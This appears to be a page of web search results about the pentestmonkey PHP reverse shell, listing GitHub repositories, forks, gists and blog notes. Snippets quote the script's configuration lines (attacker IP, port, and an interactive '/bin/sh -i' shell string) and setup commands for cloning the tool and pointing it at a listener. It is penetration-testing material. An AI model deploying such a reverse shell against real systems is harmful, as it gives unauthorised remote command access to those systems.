🌐
GitHub
github.com › pentestmonkey › php-reverse-shell
GitHub - pentestmonkey/php-reverse-shell · GitHub
Contribute to pentestmonkey/php-reverse-shell development by creating an account on GitHub.
Starred by 2.8K users
Forked by 1.9K users
Languages   PHP
🌐
GitHub
raw.githubusercontent.com › pentestmonkey › php-reverse-shell › master › php-reverse-shell.php
PentestMonkey php-reverse-shell - GitHub
open and streamsetblocking require PHP version 4.3+, or 5+ // Use of streamselect() on file descriptors returned by proc_open() will fail and return FALSE under Windows. // Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available. // // Usage // ----- // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
🌐
GitHub
github.com › ivan-sincek › php-reverse-shell
GitHub - ivan-sincek/php-reverse-shell: PHP shells that work on Linux OS, macOS, and Windows OS. · GitHub
Just a little refresh on the popular PHP reverse shell script pentestmonkey/php-reverse-shell.
Starred by 531 users
Forked by 154 users
Languages   PHP
🌐
GitHub
github.com › pentestmonkey › php-reverse-shell › blob › master › php-reverse-shell.php
php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shell
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck. · set_time_limit (0); $VERSION = "1.0"; $ip = '127.0.0.1'; // CHANGE THIS · $port = 1234; // CHANGE THIS · $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; ·
Author   pentestmonkey
🌐
Github
n0a110w.github.io › notes › security-stuff › shells › php.html
php - n0a110w.github.io
credit: pentestmonkey: php-reverse-shell.php · # download the repository git clone https://github.com/pentestmonkey/php-reverse-shell.git # modify the source so it uses a listener's IP of choice cd php-reverse-shell sed -i 's/127.0.0.1/IPADDR/' php-reverse-shell.php # now the file is ready ...
🌐
GitHub
github.com › pentestmonkey
pentestmonkey - Overview
pentestmonkey Follow · Follow · 2.2k followers · 0 following · x3 · x3 · Block or report user · Report abuse · Contact GitHub support about this user’s behavior. Learn more about reporting abuse. Report abuse · More · Overview · Repositories · Projects · Packages · Stars · php-reverse-shell ·
🌐
Pentestmonkey
pentestmonkey.net › tools › web-shells › php-reverse-shell
php-reverse-shell | pentestmonkey
To prevent someone else from abusing your backdoor – a nightmare scenario while pentesting – you need to modify the source code to indicate where you want the reverse shell thrown back to. Edit the following lines of php-reverse-shell.php:
🌐
GitHub
github.com › pentestmonkey › php-reverse-shell › blob › master › README.md
php-reverse-shell/README.md at master · pentestmonkey/php-reverse-shell
Contribute to pentestmonkey/php-reverse-shell development by creating an account on GitHub.
Author   pentestmonkey
🌐
GitHub
github.com › pentestmonkey › php-reverse-shell › tree › 8aa37ebe03d896b432c4b4469028e2bed75785f1
GitHub - pentestmonkey/php-reverse-shell at 8aa37ebe03d896b432c4b4469028e2bed75785f1 · GitHub
Contribute to pentestmonkey/php-reverse-shell development by creating an account on GitHub.
Starred by 2.7K users
Forked by 1.9K users
Languages   PHP
Find elsewhere
🌐
GitHub
github.com › topics › php-reverse-shell
php-reverse-shell · GitHub Topics · GitHub
reverse-shell php-reverse-shell python-reverse-shell perl-reverse-shell udp-reverse-shell socat-reverse-shell nc-reverse-shell openssl-reverse-shell · Updated · Aug 27, 2023 · Python · Star 4 · Pentestmonkeys' PHP reverse shell with dynamic host and port passing through GET request parameters ·
🌐
D3adshoth8ck
d3adshoth8ck.github.io › 2025 › 06 › 27 › pentestmonkey-reverse-shell.html
The Legendary PHP Reverse Shell by Pentestmonkey
Huge respect to Pentestmonkey — pentestmonkey.net — for sharing this script with the community. It’s pure gold. ```php <?php // php-reverse-shell - A Reverse Shell implementation in PHP // Copyright (C) 2007 pentestmonkey@pentestmonkey.net // …
🌐
GitHub
github.com › pentestmonkey › php-reverse-shell › actions
Actions · pentestmonkey/php-reverse-shell
pentestmonkey / php-reverse-shell Public · Notifications · You must be signed in to change notification settings · Fork 1.9k · Star 2.8k · Automate your workflow from idea to production · GitHub Actions makes it easy to automate all your software workflows, now with world-class CI/CD.
Author   pentestmonkey
🌐
GitHub
github.com › pentestmonkey › php-reverse-shell › pulls
Pull requests · pentestmonkey/php-reverse-shell
pentestmonkey.php · #30 opened · Jan 16, 2026 by Shahzad-Afridi-86 · Loading… · Update php-reverse-shell.php · #28 opened · Aug 19, 2025 by Linuxblackshark · Loading… · Patch 4 · #27 opened · Oct 16, 2024 by securitycastle · Loading… · 1 · Update php-reverse-shell.php ·
Author   pentestmonkey
🌐
GitHub
github.com › pentestmonkey › php-reverse-shell › projects
Projects · pentestmonkey/php-reverse-shell
Contribute to pentestmonkey/php-reverse-shell development by creating an account on GitHub.
Author   pentestmonkey
🌐
GitHub
github.com › pentestmonkey › php-reverse-shell › releases
Releases · pentestmonkey/php-reverse-shell
pentestmonkey / php-reverse-shell Public · Notifications · You must be signed in to change notification settings · Fork 1.9k · Star 2.8k · Releases · pentestmonkey/php-reverse-shell · You can create a release to package software, along with release notes and links to binary files, for other people to use.
Author   pentestmonkey
🌐
GitHub
github.com › pentestmonkey › php-reverse-shell
php-reverse-shell/ at master · pentestmonkey/php-reverse-shell
Contribute to pentestmonkey/php-reverse-shell development by creating an account on GitHub.
Author   pentestmonkey
🌐
GitHub
gist.github.com › simongomez95 › d5549fae8892de0da1956945e9f4c5f8
Php reverse shell script from pentestmonkey.net · GitHub
Download ZIP · Php reverse shell script from pentestmonkey.net · Raw · php_reverse_shell.php · This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.